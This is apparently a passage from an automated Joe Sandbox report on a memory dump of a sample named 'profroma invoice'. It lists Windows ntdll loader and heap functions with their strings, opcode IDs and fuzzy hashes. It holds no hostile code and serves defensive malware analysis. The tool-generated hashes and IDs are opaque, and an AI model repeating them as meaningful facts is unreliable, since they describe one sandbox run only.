                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                          • Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
                                                          • Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                          • Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0
                                                          Function 0175C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                                          • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                                          • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                                          • LdrpInitializeProcess, xrefs: 0175C6C4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          • Opcode ID: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                                          • Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
                                                          • Opcode Fuzzy Hash: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                                          • Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2
                                                          Function 0176096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          • Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                          • Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
                                                          • Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                          • Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60
                                                          Function 0172A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          • Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                          • Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
                                                          • Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                          • Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52
                                                          Function 01758402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                                          • @, xrefs: 01758591
                                                          • LdrpInitializeProcess, xrefs: 01758422
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          • Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                          • Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
                                                          • Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                          • Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63
                                                          Function 0175273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                                          • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                                          • .Local, xrefs: 017528D8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          • Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                          • Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
                                                          • Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                          • Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90
                                                          Function 01754AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                                          • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                          • API String ID: 0-1245972979
                                                          • Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                          • Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
                                                          • Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                          • Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91
                                                          Function 017264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          • Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                          • Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
                                                          • Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                          • Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2
                                                          Function 0174245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                                          • LdrpDynamicShimModule, xrefs: 0178A998
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                                          • apphelp.dll, xrefs: 01742462
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          • Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                          • Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
                                                          • Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                          • Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40
                                                          Function 017329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                          • HEAP: , xrefs: 01733264
                                                          • HEAP[%wZ]: , xrefs: 01733255
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          • Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                          • Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
                                                          • Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                          • Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50
                                                          Function 01730770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          • Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                          • Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
                                                          • Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                          • Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90
                                                          Function 01746962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $@
                                                          • API String ID: 0-1077428164
                                                          • Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                          • Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
                                                          • Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                          • Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62
                                                          Function 0171A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          • Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                          • Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
                                                          • Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                          • Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50
                                                          Function 01740BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
                                                          • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                                          • LdrpCheckModule, xrefs: 0178A117
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          • Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                          • Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
                                                          • Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                          • Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54
                                                          Function 01730A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          • Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                          • Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
                                                          • Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                          • Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91
                                                          Function 0175C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                                          • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          • Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                          • Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
                                                          • Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                          • Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91
                                                          Function 017DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • @, xrefs: 017DC1F1
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                                          • PreferredUILanguages, xrefs: 017DC212
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          • Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                          • Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
                                                          • Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                          • Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50
                                                          Function 017B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          • Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                          • Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
                                                          • Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                          • Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50
                                                          Function 017A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                                          • LdrpCheckRedirection, xrefs: 017A488F
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          • Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                          • Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
                                                          • Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                          • Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81
                                                          Function 01730BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-2558761708
                                                          • Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                          • Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
                                                          • Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                          • Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50
                                                          Function 017A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                                          • LdrpInitializationFailure, xrefs: 017A20FA
                                                          • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          • Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                          • Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
                                                          • Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                          • Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51
                                                          Function 017303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          • Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                          • Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
                                                          • Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                          • Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60
                                                          Function 0172A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrResSearchResource Enter, xrefs: 0172AA13
                                                          • LdrResSearchResource Exit, xrefs: 0172AA25
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          • API String ID: 0-4066393604
                                                          • Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                          • Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
                                                          • Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                          • Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50
                                                          Function 017EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
